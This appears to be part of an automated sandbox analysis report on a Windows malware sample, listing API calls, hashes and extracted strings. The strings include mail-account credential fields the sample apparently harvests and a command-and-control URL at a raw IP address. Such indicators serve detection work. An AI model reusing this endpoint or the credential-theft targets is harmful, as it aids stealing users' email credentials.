                                  • Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateDirectory
                                  • String ID:
                                  • API String ID: 4241100979-0
                                  • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                  • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                                  • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                  • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                                  APIs
                                  • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InfoNativeSystem
                                  • String ID:
                                  • API String ID: 1721193555-0
                                  • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                  • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                                  • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                  • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                                  APIs
                                  • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: send
                                  • String ID:
                                  • API String ID: 2809346765-0
                                  • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                  • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                                  • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                  • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                                  APIs
                                  • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileMove
                                  • String ID:
                                  • API String ID: 3562171763-0
                                  • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                  • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                                  • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                                  • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                                  APIs
                                  • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Startup
                                  • String ID:
                                  • API String ID: 724789610-0
                                  • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                  • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                                  • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                                  • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                                  APIs
                                  • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AttributesFile
                                  • String ID:
                                  • API String ID: 3188754299-0
                                  • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                  • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                                  • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                                  • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                                  APIs
                                  • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                  • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                                  • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                                  • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                                  APIs
                                  • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: DeleteFile
                                  • String ID:
                                  • API String ID: 4033686569-0
                                  • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                  • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                                  • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                                  • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                                  APIs
                                  • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LibraryLoad
                                  • String ID:
                                  • API String ID: 1029625771-0
                                  • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                  • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                                  • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                                  • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                                  APIs
                                  • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseFind
                                  • String ID:
                                  • API String ID: 1863332320-0
                                  • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                  • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                                  • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                                  • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                                  APIs
                                  • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AttributesFile
                                  • String ID:
                                  • API String ID: 3188754299-0
                                  • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                  • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                                  • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                  • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                                  APIs
                                  • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                  • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                                  • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                  • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                                  APIs
                                  • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExistsFilePath
                                  • String ID:
                                  • API String ID: 1174141254-0
                                  • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                  • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                                  • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                  • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                                  APIs
                                  • closesocket.WS2_32(00404EB0), ref: 00404DEB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: closesocket
                                  • String ID:
                                  • API String ID: 2781271927-0
                                  • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                  • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                                  • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                  • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                                  APIs
                                  • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeVirtual
                                  • String ID:
                                  • API String ID: 1263568516-0
                                  • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                  • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                                  • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                  • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                                  APIs
                                  • CloseHandle.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandle
                                  • String ID:
                                  • API String ID: 2962429428-0
                                  • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                  • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                                  • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                  • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                                  APIs
                                  • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep
                                  • String ID:
                                  • API String ID: 3472027048-0
                                  • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                  • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                                  • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                  • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                                  APIs
                                  • StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                                  • Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
                                  • Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                                  • Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559
                                  APIs
                                  • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                  • Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
                                  • Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                                  • Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659
                                  APIs
                                  • CoInitialize.OLE32(00000000), ref: 0040438F
                                  • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                                  • VariantInit.OLEAUT32(?), ref: 004043C4
                                  • SysAllocString.OLEAUT32(?), ref: 004043CD
                                  • VariantInit.OLEAUT32(?), ref: 00404414
                                  • SysAllocString.OLEAUT32(?), ref: 00404419
                                  • VariantInit.OLEAUT32(?), ref: 00404431
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InitVariant$AllocString$CreateInitializeInstance
                                  • String ID:
                                  • API String ID: 1312198159-0
                                  • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                  • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                                  • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                  • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                                  • API String ID: 0-2111798378
                                  • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                  • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                                  • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                                  • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 94.156.177.41/simple/five/fre.php
                                  • API String ID: 0-2274625065
                                  • Opcode ID: 63f025d4664fbb271158e577aad787fa225bfab02102f215cc5e2ce5b7102035
                                  • Instruction ID: a50a5f0329aa3bfe82f98588002e05078d35de0dbdea340faab09d79a53c7e1b
                                  • Opcode Fuzzy Hash: 63f025d4664fbb271158e577aad787fa225bfab02102f215cc5e2ce5b7102035
                                  • Instruction Fuzzy Hash: BBF0F462D491A47ADB301D565C00FB3FEA98B9B7B0F14312AB98877241C269CD41C29C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: db4539c410e0fe4373e7c5db18565f275e95a05af4a94000d4ba81a11fef15ca
                                  • Instruction ID: 891bc98f6eee734ec0083ebf38281cede3cc23ab6c94fa2f23d2f5c2768c820d
                                  • Opcode Fuzzy Hash: db4539c410e0fe4373e7c5db18565f275e95a05af4a94000d4ba81a11fef15ca
                                  • Instruction Fuzzy Hash: D141F1B0614B205EE30C8F19C895676BFE2EF82341748C07EE8AE8F695C635D506EF58
                                  Memory Dump Source
